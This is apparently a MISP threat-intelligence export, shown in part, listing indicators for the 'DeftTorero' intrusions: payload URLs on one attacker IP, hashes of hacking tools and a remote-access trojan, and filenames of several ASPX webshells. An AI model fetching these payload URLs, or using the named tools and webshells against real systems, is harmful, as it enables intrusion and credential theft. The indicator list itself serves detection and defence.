2565 lines
No EOL
86 KiB
JSON
2565 lines
No EOL
86 KiB
JSON
{
|
|
"Event": {
|
|
"analysis": "0",
|
|
"date": "2022-10-03",
|
|
"extends_uuid": "",
|
|
"info": "DeftTorero: tactics, techniques and procedures of intrusions revealed",
|
|
"publish_timestamp": "1666603272",
|
|
"published": true,
|
|
"threat_level_id": "4",
|
|
"timestamp": "1665044144",
|
|
"uuid": "2e7a515f-c380-4915-a505-9568ccc00d22",
|
|
"Orgc": {
|
|
"name": "CIRCL",
|
|
"uuid": "55f6ea5e-2c60-40e5-964f-47a8950d210f"
|
|
},
|
|
"Tag": [
|
|
{
|
|
"colour": "#002b4a",
|
|
"local": false,
|
|
"name": "osint:source-type=\"technical-report\"",
|
|
"relationship_type": ""
|
|
},
|
|
{
|
|
"colour": "#4c3011",
|
|
"local": false,
|
|
"name": "cccs:malware_classification=\"webshell\"",
|
|
"relationship_type": ""
|
|
},
|
|
{
|
|
"colour": "#825600",
|
|
"local": false,
|
|
"name": "cert-ist:malware_type=\"Webshell\"",
|
|
"relationship_type": ""
|
|
},
|
|
{
|
|
"colour": "#004646",
|
|
"local": false,
|
|
"name": "type:OSINT",
|
|
"relationship_type": ""
|
|
},
|
|
{
|
|
"colour": "#0071c3",
|
|
"local": false,
|
|
"name": "osint:lifetime=\"perpetual\"",
|
|
"relationship_type": ""
|
|
},
|
|
{
|
|
"colour": "#0087e8",
|
|
"local": false,
|
|
"name": "osint:certainty=\"50\"",
|
|
"relationship_type": ""
|
|
},
|
|
{
|
|
"colour": "#ffffff",
|
|
"local": false,
|
|
"name": "tlp:white",
|
|
"relationship_type": ""
|
|
},
|
|
{
|
|
"colour": "#0088cc",
|
|
"local": false,
|
|
"name": "misp-galaxy:malpedia=\"MimiKatz\"",
|
|
"relationship_type": ""
|
|
},
|
|
{
|
|
"colour": "#0088cc",
|
|
"local": false,
|
|
"name": "misp-galaxy:mitre-enterprise-attack-tool=\"Mimikatz - S0002\"",
|
|
"relationship_type": ""
|
|
},
|
|
{
|
|
"colour": "#0088cc",
|
|
"local": false,
|
|
"name": "misp-galaxy:mitre-tool=\"Mimikatz - S0002\"",
|
|
"relationship_type": ""
|
|
},
|
|
{
|
|
"colour": "#064800",
|
|
"local": false,
|
|
"name": "misp-galaxy:tool=\"Mimikatz\"",
|
|
"relationship_type": ""
|
|
},
|
|
{
|
|
"colour": "#0088cc",
|
|
"local": false,
|
|
"name": "misp-galaxy:tool=\"Netcat\"",
|
|
"relationship_type": ""
|
|
},
|
|
{
|
|
"colour": "#0088cc",
|
|
"local": false,
|
|
"name": "misp-galaxy:mitre-intrusion-set=\"Volatile Cedar - G0123\"",
|
|
"relationship_type": ""
|
|
},
|
|
{
|
|
"colour": "#0088cc",
|
|
"local": false,
|
|
"name": "misp-galaxy:threat-actor=\"Volatile Cedar\"",
|
|
"relationship_type": ""
|
|
}
|
|
],
|
|
"Attribute": [
|
|
{
|
|
"category": "Network activity",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1664888101",
|
|
"to_ids": true,
|
|
"type": "url",
|
|
"uuid": "36fff9ba-3e97-45f2-abd3-b720b7020d4d",
|
|
"value": "http://200.159.87.196:3306/jsJ13j.sct"
|
|
},
|
|
{
|
|
"category": "Network activity",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1664888101",
|
|
"to_ids": true,
|
|
"type": "url",
|
|
"uuid": "e4ae6f13-41ef-4955-9eb5-cf7f7ee45373",
|
|
"value": "http://200.159.87.196/made.xn--ps1-to0a"
|
|
},
|
|
{
|
|
"category": "Network activity",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1664888101",
|
|
"to_ids": true,
|
|
"type": "url",
|
|
"uuid": "8e2e035f-ff9d-48c2-8760-31a59f7a4d07",
|
|
"value": "http://200.159.87.196/av.xn--vbs-to0a"
|
|
},
|
|
{
|
|
"category": "Network activity",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1664888101",
|
|
"to_ids": true,
|
|
"type": "url",
|
|
"uuid": "c8b20fa5-8fb5-4a8d-b69c-c9bc7c0b142a",
|
|
"value": "http://200.159.87.196/1.msi"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1664888101",
|
|
"to_ids": true,
|
|
"type": "sha256",
|
|
"uuid": "6eb65ccf-abf8-4d91-8b13-9e13234e3b4c",
|
|
"value": "f0e6510103deefce338777a81cbfb7529eefa69bafad0d6fd63b4944f916c076"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "HackTool:Win32/LaZagne",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1664888101",
|
|
"to_ids": true,
|
|
"type": "sha256",
|
|
"uuid": "87f605fa-69e0-4035-952e-024d3a1760be",
|
|
"value": "ed2f501408a7a6e1a854c29c4b0bc5648a6aa8612432df829008931b3e34bf56"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "HackTool:JS/ReGeorg",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1664888101",
|
|
"to_ids": true,
|
|
"type": "sha256",
|
|
"uuid": "747cf011-44fb-4e11-b299-2a71603ccb94",
|
|
"value": "c1f43b7cf46ba12cfc1357b17e4f5af408740af7ae70572c9cf988ac50260ce1"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "Trojan:Win32/Pynamer.B!ac",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1664888101",
|
|
"to_ids": true,
|
|
"type": "sha256",
|
|
"uuid": "210ee4ac-7c7a-4d54-875a-312a3503a755",
|
|
"value": "b42725211240828ccc505d193d8ea5915e395c9f43e71496ff0ece4f72e3e4ab"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "TEL:SCPT_LCSuspiPSPattern35",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1664888101",
|
|
"to_ids": true,
|
|
"type": "sha256",
|
|
"uuid": "1cc4cabd-03f9-40b4-a5b7-fee8af302390",
|
|
"value": "a16bdcfa4cc73f87f6eea9795acb75b6b40f80e0bba6394b39f37b7b1fd1f4ad"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1664888101",
|
|
"to_ids": true,
|
|
"type": "sha256",
|
|
"uuid": "db592c3e-86e5-49f5-b93f-c8c877eabc60",
|
|
"value": "8737f06d7374ff54a9ad728f53c09f89070beca02a305f11fc1e26c8fb33f049"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "Explosive RAT EXE",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1664891857",
|
|
"to_ids": true,
|
|
"type": "md5",
|
|
"uuid": "231b1d67-7f41-4ca5-9d9f-15142756b299",
|
|
"value": "53ee31c009e96d4b079ebe3267d0ae8e"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "Explosive RAT EXE",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1664891857",
|
|
"to_ids": true,
|
|
"type": "md5",
|
|
"uuid": "13b201a9-7228-48f4-89fa-8ae9e3316287",
|
|
"value": "54ebc45137ba5b9f5ece35ca40267100"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "Explosive RAT EXE",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1664891857",
|
|
"to_ids": true,
|
|
"type": "md5",
|
|
"uuid": "559f1c1b-5ea9-4cb7-8635-eff4b0dbff67",
|
|
"value": "a955b45e14d082f71e01ebc52cf13db8"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "Explosive RAT EXE",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1664891857",
|
|
"to_ids": true,
|
|
"type": "md5",
|
|
"uuid": "3c5b75f1-ab87-4271-ba98-d89820fdba9b",
|
|
"value": "e952ec767d872ea08d8555cbc162f3dc"
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "Explosive RAT EXE",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"timestamp": "1664891857",
|
|
"to_ids": true,
|
|
"type": "md5",
|
|
"uuid": "bda5859a-ba78-49c8-824c-bc5453f43747",
|
|
"value": "ed50613683b5a4196e0d5fd2687c56da"
|
|
}
|
|
],
|
|
"Object": [
|
|
{
|
|
"comment": "",
|
|
"deleted": false,
|
|
"description": "Metadata used to generate an executive level report",
|
|
"meta-category": "misc",
|
|
"name": "report",
|
|
"template_uuid": "70a68471-df22-4e3f-aa1a-5a3be19f82df",
|
|
"template_version": "7",
|
|
"timestamp": "1664962552",
|
|
"uuid": "1a66ee6b-c9bc-4567-b3c8-85592349e44e",
|
|
"Attribute": [
|
|
{
|
|
"category": "External analysis",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "link",
|
|
"timestamp": "1664962533",
|
|
"to_ids": false,
|
|
"type": "link",
|
|
"uuid": "49f85d63-6572-408d-8617-a1b94cf303b5",
|
|
"value": "https://otx.alienvault.com/pulse/633acb17ed56f34d3779a9a4"
|
|
},
|
|
{
|
|
"category": "External analysis",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "link",
|
|
"timestamp": "1664962533",
|
|
"to_ids": false,
|
|
"type": "link",
|
|
"uuid": "49032ca0-1735-4250-acaf-cfe07fba999b",
|
|
"value": "https://securelist.com/defttorero-tactics-techniques-and-procedures/107610/"
|
|
},
|
|
{
|
|
"category": "Other",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": true,
|
|
"object_relation": "type",
|
|
"timestamp": "1664962533",
|
|
"to_ids": false,
|
|
"type": "text",
|
|
"uuid": "68f89fe7-3c76-4085-8841-26168b11c786",
|
|
"value": "Online"
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "basic ASPX webshell",
|
|
"deleted": false,
|
|
"description": "File object describing a file with meta-information",
|
|
"meta-category": "file",
|
|
"name": "file",
|
|
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
|
|
"template_version": "24",
|
|
"timestamp": "1664892131",
|
|
"uuid": "a973cd15-c719-4c43-baed-389d38f35d95",
|
|
"Attribute": [
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "md5",
|
|
"timestamp": "1664892131",
|
|
"to_ids": true,
|
|
"type": "md5",
|
|
"uuid": "58345ca3-69bc-4007-8b17-efa08301664f",
|
|
"value": "0a45de1cdf39e0ad67f5d88c730b433a",
|
|
"Tag": [
|
|
{
|
|
"colour": "#4c3011",
|
|
"local": false,
|
|
"name": "cccs:malware_classification=\"webshell\"",
|
|
"relationship_type": ""
|
|
},
|
|
{
|
|
"colour": "#825600",
|
|
"local": false,
|
|
"name": "cert-ist:malware_type=\"Webshell\"",
|
|
"relationship_type": ""
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": true,
|
|
"object_relation": "filename",
|
|
"timestamp": "1664892070",
|
|
"to_ids": true,
|
|
"type": "filename",
|
|
"uuid": "acc3a9e8-3ae3-404f-a398-586bcbde837e",
|
|
"value": "cmd.aspx",
|
|
"Tag": [
|
|
{
|
|
"colour": "#4c3011",
|
|
"local": false,
|
|
"name": "cccs:malware_classification=\"webshell\"",
|
|
"relationship_type": ""
|
|
},
|
|
{
|
|
"colour": "#825600",
|
|
"local": false,
|
|
"name": "cert-ist:malware_type=\"Webshell\"",
|
|
"relationship_type": ""
|
|
}
|
|
]
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "Tunna webshell",
|
|
"deleted": false,
|
|
"description": "File object describing a file with meta-information",
|
|
"meta-category": "file",
|
|
"name": "file",
|
|
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
|
|
"template_version": "24",
|
|
"timestamp": "1664962533",
|
|
"uuid": "fdb14fbf-8855-4433-86a4-7f37d4dc298a",
|
|
"Attribute": [
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "md5",
|
|
"timestamp": "1664962533",
|
|
"to_ids": true,
|
|
"type": "md5",
|
|
"uuid": "654ebfdd-406d-4082-a730-693404e6ccd9",
|
|
"value": "0d6bc7b184f9e1908d4d3fe0a7038a1e",
|
|
"Tag": [
|
|
{
|
|
"colour": "#4c3011",
|
|
"local": false,
|
|
"name": "cccs:malware_classification=\"webshell\"",
|
|
"relationship_type": ""
|
|
},
|
|
{
|
|
"colour": "#825600",
|
|
"local": false,
|
|
"name": "cert-ist:malware_type=\"Webshell\"",
|
|
"relationship_type": ""
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": true,
|
|
"object_relation": "filename",
|
|
"timestamp": "1664962533",
|
|
"to_ids": true,
|
|
"type": "filename",
|
|
"uuid": "dd2ba74c-ff8a-4449-bdb2-e71888d102d6",
|
|
"value": "c.aspx/conn.aspx",
|
|
"Tag": [
|
|
{
|
|
"colour": "#4c3011",
|
|
"local": false,
|
|
"name": "cccs:malware_classification=\"webshell\"",
|
|
"relationship_type": ""
|
|
},
|
|
{
|
|
"colour": "#825600",
|
|
"local": false,
|
|
"name": "cert-ist:malware_type=\"Webshell\"",
|
|
"relationship_type": ""
|
|
}
|
|
]
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "ASPX webshell",
|
|
"deleted": false,
|
|
"description": "File object describing a file with meta-information",
|
|
"meta-category": "file",
|
|
"name": "file",
|
|
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
|
|
"template_version": "24",
|
|
"timestamp": "1664962533",
|
|
"uuid": "525451ee-62dd-43d8-a8b7-55abd922adc7",
|
|
"Attribute": [
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "md5",
|
|
"timestamp": "1664962533",
|
|
"to_ids": true,
|
|
"type": "md5",
|
|
"uuid": "01a93c42-86c6-4042-89f9-b3880cff3e23",
|
|
"value": "c87a206a9c9846a2d1c3537d459ec03a",
|
|
"Tag": [
|
|
{
|
|
"colour": "#4c3011",
|
|
"local": false,
|
|
"name": "cccs:malware_classification=\"webshell\"",
|
|
"relationship_type": ""
|
|
},
|
|
{
|
|
"colour": "#825600",
|
|
"local": false,
|
|
"name": "cert-ist:malware_type=\"Webshell\"",
|
|
"relationship_type": ""
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": true,
|
|
"object_relation": "filename",
|
|
"timestamp": "1664962533",
|
|
"to_ids": true,
|
|
"type": "filename",
|
|
"uuid": "e9af7187-9e0d-4ddf-9b1b-7e3868291595",
|
|
"value": "the.aspx",
|
|
"Tag": [
|
|
{
|
|
"colour": "#4c3011",
|
|
"local": false,
|
|
"name": "cccs:malware_classification=\"webshell\"",
|
|
"relationship_type": ""
|
|
},
|
|
{
|
|
"colour": "#825600",
|
|
"local": false,
|
|
"name": "cert-ist:malware_type=\"Webshell\"",
|
|
"relationship_type": ""
|
|
}
|
|
]
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "Devel webshell",
|
|
"deleted": false,
|
|
"description": "File object describing a file with meta-information",
|
|
"meta-category": "file",
|
|
"name": "file",
|
|
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
|
|
"template_version": "24",
|
|
"timestamp": "1664962533",
|
|
"uuid": "c06eacaa-7f97-4d84-99e5-a52624bde69a",
|
|
"Attribute": [
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "md5",
|
|
"timestamp": "1664962533",
|
|
"to_ids": true,
|
|
"type": "md5",
|
|
"uuid": "cf8ea2e0-0974-4808-a6d3-fec22eb8c0d8",
|
|
"value": "02bcd71a4d7c3a366eff733f92702b81",
|
|
"Tag": [
|
|
{
|
|
"colour": "#4c3011",
|
|
"local": false,
|
|
"name": "cccs:malware_classification=\"webshell\"",
|
|
"relationship_type": ""
|
|
},
|
|
{
|
|
"colour": "#825600",
|
|
"local": false,
|
|
"name": "cert-ist:malware_type=\"Webshell\"",
|
|
"relationship_type": ""
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": true,
|
|
"object_relation": "filename",
|
|
"timestamp": "1664962533",
|
|
"to_ids": true,
|
|
"type": "filename",
|
|
"uuid": "7a58db6b-b8ba-46eb-84f7-2975bfd4c7d4",
|
|
"value": "devel.aspx",
|
|
"Tag": [
|
|
{
|
|
"colour": "#4c3011",
|
|
"local": false,
|
|
"name": "cccs:malware_classification=\"webshell\"",
|
|
"relationship_type": ""
|
|
},
|
|
{
|
|
"colour": "#825600",
|
|
"local": false,
|
|
"name": "cert-ist:malware_type=\"Webshell\"",
|
|
"relationship_type": ""
|
|
}
|
|
]
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "reGeorg webshell\r\n",
|
|
"deleted": false,
|
|
"description": "File object describing a file with meta-information",
|
|
"meta-category": "file",
|
|
"name": "file",
|
|
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
|
|
"template_version": "24",
|
|
"timestamp": "1664962533",
|
|
"uuid": "9b5e4f23-aaa3-4904-8697-8ffb60580067",
|
|
"Attribute": [
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "md5",
|
|
"timestamp": "1664962533",
|
|
"to_ids": true,
|
|
"type": "md5",
|
|
"uuid": "de90d446-2d94-46e0-b418-09778419174e",
|
|
"value": "d6a82b866f7f9e1e01bf89c3da106d9d",
|
|
"Tag": [
|
|
{
|
|
"colour": "#4c3011",
|
|
"local": false,
|
|
"name": "cccs:malware_classification=\"webshell\"",
|
|
"relationship_type": ""
|
|
},
|
|
{
|
|
"colour": "#825600",
|
|
"local": false,
|
|
"name": "cert-ist:malware_type=\"Webshell\"",
|
|
"relationship_type": ""
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": true,
|
|
"object_relation": "filename",
|
|
"timestamp": "1664962533",
|
|
"to_ids": true,
|
|
"type": "filename",
|
|
"uuid": "fc390f3c-888e-4504-99d3-51e5bd27f3e4",
|
|
"value": "Banner.aspx",
|
|
"Tag": [
|
|
{
|
|
"colour": "#4c3011",
|
|
"local": false,
|
|
"name": "cccs:malware_classification=\"webshell\"",
|
|
"relationship_type": ""
|
|
},
|
|
{
|
|
"colour": "#825600",
|
|
"local": false,
|
|
"name": "cert-ist:malware_type=\"Webshell\"",
|
|
"relationship_type": ""
|
|
}
|
|
]
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "webshell",
|
|
"deleted": false,
|
|
"description": "File object describing a file with meta-information",
|
|
"meta-category": "file",
|
|
"name": "file",
|
|
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
|
|
"template_version": "24",
|
|
"timestamp": "1664962533",
|
|
"uuid": "d2de8e0f-ac72-47d1-8de8-f4843d91970d",
|
|
"Attribute": [
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "md5",
|
|
"timestamp": "1664962533",
|
|
"to_ids": true,
|
|
"type": "md5",
|
|
"uuid": "deeed8c5-39e2-45fd-89a8-3a7cba559cfa",
|
|
"value": "c59870690803d976014c7c8b58659ddf",
|
|
"Tag": [
|
|
{
|
|
"colour": "#4c3011",
|
|
"local": false,
|
|
"name": "cccs:malware_classification=\"webshell\"",
|
|
"relationship_type": ""
|
|
},
|
|
{
|
|
"colour": "#825600",
|
|
"local": false,
|
|
"name": "cert-ist:malware_type=\"Webshell\"",
|
|
"relationship_type": ""
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": true,
|
|
"object_relation": "filename",
|
|
"timestamp": "1664962533",
|
|
"to_ids": true,
|
|
"type": "filename",
|
|
"uuid": "69647e0c-c577-4db5-be46-3bd6d2820216",
|
|
"value": "03831a5291724ef2060127f19206eiab.aspx",
|
|
"Tag": [
|
|
{
|
|
"colour": "#4c3011",
|
|
"local": false,
|
|
"name": "cccs:malware_classification=\"webshell\"",
|
|
"relationship_type": ""
|
|
},
|
|
{
|
|
"colour": "#825600",
|
|
"local": false,
|
|
"name": "cert-ist:malware_type=\"Webshell\"",
|
|
"relationship_type": ""
|
|
}
|
|
]
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "Caterpillar webshell",
|
|
"deleted": false,
|
|
"description": "File object describing a file with meta-information",
|
|
"meta-category": "file",
|
|
"name": "file",
|
|
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
|
|
"template_version": "24",
|
|
"timestamp": "1664962533",
|
|
"uuid": "2adbdbd0-5cf9-4142-bc43-0bf7ff1c890d",
|
|
"Attribute": [
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "md5",
|
|
"timestamp": "1664962533",
|
|
"to_ids": true,
|
|
"type": "md5",
|
|
"uuid": "a5573421-319a-4c7f-9db6-0c94b838f69d",
|
|
"value": "1ed9169bed85efb1fd5f8d50333252d8",
|
|
"Tag": [
|
|
{
|
|
"colour": "#4c3011",
|
|
"local": false,
|
|
"name": "cccs:malware_classification=\"webshell\"",
|
|
"relationship_type": ""
|
|
},
|
|
{
|
|
"colour": "#825600",
|
|
"local": false,
|
|
"name": "cert-ist:malware_type=\"Webshell\"",
|
|
"relationship_type": ""
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": true,
|
|
"object_relation": "filename",
|
|
"timestamp": "1664962533",
|
|
"to_ids": true,
|
|
"type": "filename",
|
|
"uuid": "0579ba64-f209-463f-9e77-619ba27c7ff8",
|
|
"value": "aram.aspx",
|
|
"Tag": [
|
|
{
|
|
"colour": "#4c3011",
|
|
"local": false,
|
|
"name": "cccs:malware_classification=\"webshell\"",
|
|
"relationship_type": ""
|
|
},
|
|
{
|
|
"colour": "#825600",
|
|
"local": false,
|
|
"name": "cert-ist:malware_type=\"Webshell\"",
|
|
"relationship_type": ""
|
|
}
|
|
]
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "Caterpillar webshell",
|
|
"deleted": false,
|
|
"description": "File object describing a file with meta-information",
|
|
"meta-category": "file",
|
|
"name": "file",
|
|
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
|
|
"template_version": "24",
|
|
"timestamp": "1664962533",
|
|
"uuid": "5bfc7b92-0962-44ee-a4ed-d5640e1cd6a1",
|
|
"Attribute": [
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "md5",
|
|
"timestamp": "1664962532",
|
|
"to_ids": true,
|
|
"type": "md5",
|
|
"uuid": "d35e1b38-6d2a-430f-86d5-dc1d905f4586",
|
|
"value": "2d804386de4073bad642dfc816876d08",
|
|
"Tag": [
|
|
{
|
|
"colour": "#4c3011",
|
|
"local": false,
|
|
"name": "cccs:malware_classification=\"webshell\"",
|
|
"relationship_type": ""
|
|
},
|
|
{
|
|
"colour": "#825600",
|
|
"local": false,
|
|
"name": "cert-ist:malware_type=\"Webshell\"",
|
|
"relationship_type": ""
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": true,
|
|
"object_relation": "filename",
|
|
"timestamp": "1664962533",
|
|
"to_ids": true,
|
|
"type": "filename",
|
|
"uuid": "937fbcc8-1954-43f3-a900-8346b734c381",
|
|
"value": "Pavos.aspx",
|
|
"Tag": [
|
|
{
|
|
"colour": "#4c3011",
|
|
"local": false,
|
|
"name": "cccs:malware_classification=\"webshell\"",
|
|
"relationship_type": ""
|
|
},
|
|
{
|
|
"colour": "#825600",
|
|
"local": false,
|
|
"name": "cert-ist:malware_type=\"Webshell\"",
|
|
"relationship_type": ""
|
|
}
|
|
]
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "ASPX webshell\r\n",
|
|
"deleted": false,
|
|
"description": "File object describing a file with meta-information",
|
|
"meta-category": "file",
|
|
"name": "file",
|
|
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
|
|
"template_version": "24",
|
|
"timestamp": "1664962532",
|
|
"uuid": "d992ce91-b710-4f38-ac8c-36e6183d1543",
|
|
"Attribute": [
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "md5",
|
|
"timestamp": "1664962532",
|
|
"to_ids": true,
|
|
"type": "md5",
|
|
"uuid": "76e4d784-42ca-4092-a172-b20333549855",
|
|
"value": "523aa999b9270b382968e5c24ab6f9eb",
|
|
"Tag": [
|
|
{
|
|
"colour": "#4c3011",
|
|
"local": false,
|
|
"name": "cccs:malware_classification=\"webshell\"",
|
|
"relationship_type": ""
|
|
},
|
|
{
|
|
"colour": "#825600",
|
|
"local": false,
|
|
"name": "cert-ist:malware_type=\"Webshell\"",
|
|
"relationship_type": ""
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": true,
|
|
"object_relation": "filename",
|
|
"timestamp": "1664962532",
|
|
"to_ids": true,
|
|
"type": "filename",
|
|
"uuid": "b27d7bb8-34ee-4d9e-8ad6-06524d033f4e",
|
|
"value": "Report_21.jpg",
|
|
"Tag": [
|
|
{
|
|
"colour": "#4c3011",
|
|
"local": false,
|
|
"name": "cccs:malware_classification=\"webshell\"",
|
|
"relationship_type": ""
|
|
},
|
|
{
|
|
"colour": "#825600",
|
|
"local": false,
|
|
"name": "cert-ist:malware_type=\"Webshell\"",
|
|
"relationship_type": ""
|
|
}
|
|
]
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "ASPXSpy webshell",
|
|
"deleted": false,
|
|
"description": "File object describing a file with meta-information",
|
|
"meta-category": "file",
|
|
"name": "file",
|
|
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
|
|
"template_version": "24",
|
|
"timestamp": "1664962532",
|
|
"uuid": "c4fc319e-0659-4a8a-8cbb-18b2eba56ac1",
|
|
"Attribute": [
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": true,
|
|
"object_relation": "filename",
|
|
"timestamp": "1664962532",
|
|
"to_ids": true,
|
|
"type": "filename",
|
|
"uuid": "cc54f63c-f264-4fc7-a55e-70ef9210588e",
|
|
"value": "aspxspy2014final.aspx",
|
|
"Tag": [
|
|
{
|
|
"colour": "#4c3011",
|
|
"local": false,
|
|
"name": "cccs:malware_classification=\"webshell\"",
|
|
"relationship_type": ""
|
|
},
|
|
{
|
|
"colour": "#825600",
|
|
"local": false,
|
|
"name": "cert-ist:malware_type=\"Webshell\"",
|
|
"relationship_type": ""
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "md5",
|
|
"timestamp": "1664962532",
|
|
"to_ids": true,
|
|
"type": "md5",
|
|
"uuid": "e6467a2e-b645-49ba-bf0e-ccf62a1f9ba2",
|
|
"value": "45d854e66631e5c1cda6dbf4fea074ce",
|
|
"Tag": [
|
|
{
|
|
"colour": "#4c3011",
|
|
"local": false,
|
|
"name": "cccs:malware_classification=\"webshell\"",
|
|
"relationship_type": ""
|
|
},
|
|
{
|
|
"colour": "#825600",
|
|
"local": false,
|
|
"name": "cert-ist:malware_type=\"Webshell\"",
|
|
"relationship_type": ""
|
|
}
|
|
]
|
|
}
|
|
]
|
|
},
|
|
{
|
|
"comment": "Sec4ever webshell\r\n",
|
|
"deleted": false,
|
|
"description": "File object describing a file with meta-information",
|
|
"meta-category": "file",
|
|
"name": "file",
|
|
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
|
|
"template_version": "24",
|
|
"timestamp": "1664962532",
|
|
"uuid": "f41e258b-608d-49e7-b38b-df2321e2fe0d",
|
|
"Attribute": [
|
|
{
|
|
"category": "Payload delivery",
|
|
"comment": "",
|
|
"deleted": false,
|
|
"disable_correlation": false,
|
|
"object_relation": "md5",
|
|
"timestamp": "1664962532",
|
|
"to_ids": true,
|
|
"type": "md5",
|
|
"uuid": "46436a94-ade1-4719-a3c1-073050108421",
|
|
"value": "bb767354ee886f69b4ab4f9b4ac6b660",
|
|
"Tag": [
|
|
{
|
|
"colour": "#4c3011",
|
|
"local": false,
|
|
"name": "cccs:malware_classification=\"webshell\"",
|
|
